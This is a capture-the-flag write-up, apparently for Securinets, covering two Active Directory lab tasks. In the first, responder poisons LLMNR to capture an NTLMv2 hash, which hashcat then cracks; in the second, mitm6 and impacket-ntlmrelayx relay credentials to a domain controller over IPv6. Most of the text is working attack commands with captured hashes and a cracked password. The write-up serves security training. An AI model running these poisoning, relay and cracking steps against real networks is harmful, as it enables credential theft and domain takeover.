Overview of the network
TASK: LLMNR poisoning
Intercepting the user hash
We start by getting the network interface name
1
sudo ifconfig
We’re going to use the responder package which comes preinstalled in kali linux. So basically we’re going to provide our network interface to responder , and let him do its magic
1
sudo responder -I eth0 -rdwv
And we wait until a user accidentally make a mistake while writing his hostname instead of providing a legitimate hostname in the DNS. And get his NTLMv2 hash.
1
2
Username:naruto
Hash: naruto:::0099db0783fde495:F2C5BF32BD89C576A1E95A54D4BF7664:0101000000000000C0653150DE09D20121A6F48A2D912BFA000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D20106000400020000000800300030000000000000000000000000300000B1EAB93D8ABDC394076EB8F8CA0CCF66489376BD473809472A94F666423EA3C20A0010000000000000000000000000000000000009001A0063006900660073002F00310030002E0030002E0030002E0036000000000000000000
Cracking the HASH
We’re going to use hashcat and rockyou wordlist to crack this hash,Basically we just need the Hash-Mod First of all, we’re going to look for NTLMv2 Hash-Mod
` https://hashcat.net/wiki/doku.php?id=example_hashes `
Finally run hashcat,
1
hashcat.exe -m 5600 hash.txt rockyou.txt
And we wait until hashcat cracks it
1
2
NARUTO:::bb5943c5efa0d0b9:b8a5d31bab00af7d8d013d1d7142dbdf:0101000000000000c0653150de09d201542d404b9a268f50000000000200080053004d004200330001001e00570049004e002d00500052004800340039003200520051004100460056000400140053004d00420033002e006c006f00630061006c0003003400570049004e002d00500052004800340039003200520051004100460056002e0053004d00420033002e006c006f00630061006c000500140053004d00420033002e006c006f00630061006c0007000800c0653150de09d20106000400020000000800300030000000000000000000000000300000b1eab93d8abdc394076eb8f8ca0ccf66489376bd473809472a94f666423ea3c20a0010000000000000000000000000000000000009001a0063006900660073002f00310030002e0030002e0030002e0036000000000000000000:kelvinP@ssw0rd
FLAG
1
Securinets{kelvinP@ssw0rd}
Task: IPv6 Attack
Preparing for the Attack
We’re going to start with gathering informations about the network
1
sudo ifconfig
Network address: 10.0.0.0/24
Let’s now find the hosts IPs, It may take a while
1
nmap 10.0.0.0/24 -Pn | grep 10.0.0 | awk '{print $6}' | uniq > ips.txt
Now let’s an nmap scan on the result
1
sudo nmap -sV -n -v -Pn -p- T4 -iL ips.txt -A --open -oA nmap
Or you can directly
1
sudo nmap -sC -sV -p- T4 10.0.0.0/24 -oA nmap
After viewing the nmap results we can see that 10.0.0.7 is ip of the domain controller
We can get the domain name either from the nmap results or by enumerating the ldap
1
ldapsearch -h 10.0.0.7 -x -s base namingcontexts
1
2
namingcontexts: DC=SECURINETS,DC=local
// SECURINETS.local is the domain name
Attacking
So basically we’re going to acts as an IPv6 router responsding to configuration request from the machine and assign it with an IPv6 address and an IPv6 DNS server. We going to use mitm6 ( https://github.com/fox-it/mitm6 ) which will act as IPv6 Router during the attack and ntlmrelayx ( Comes preinstalled in kali ) to capture the credentials and relay them to target machine.
Let’s start by setting up mitm6
1
sudo mitm6 -d SECURINETS.local
Let’s now set up our ntlm relay
1
sudo impacket-ntlmrelayx -6 -t ldaps://10.0.0.7 -wh pwned.SECURINETS.local -l l00t
And wait until we get something juicy
A folder l00t has been created which contains informations about the AD
And we grab our flag
1
cat * | grep Securinets
Flag
1
Securinets{U_D1d_W3ll_S0lv1ng_Th1s_AD_Master}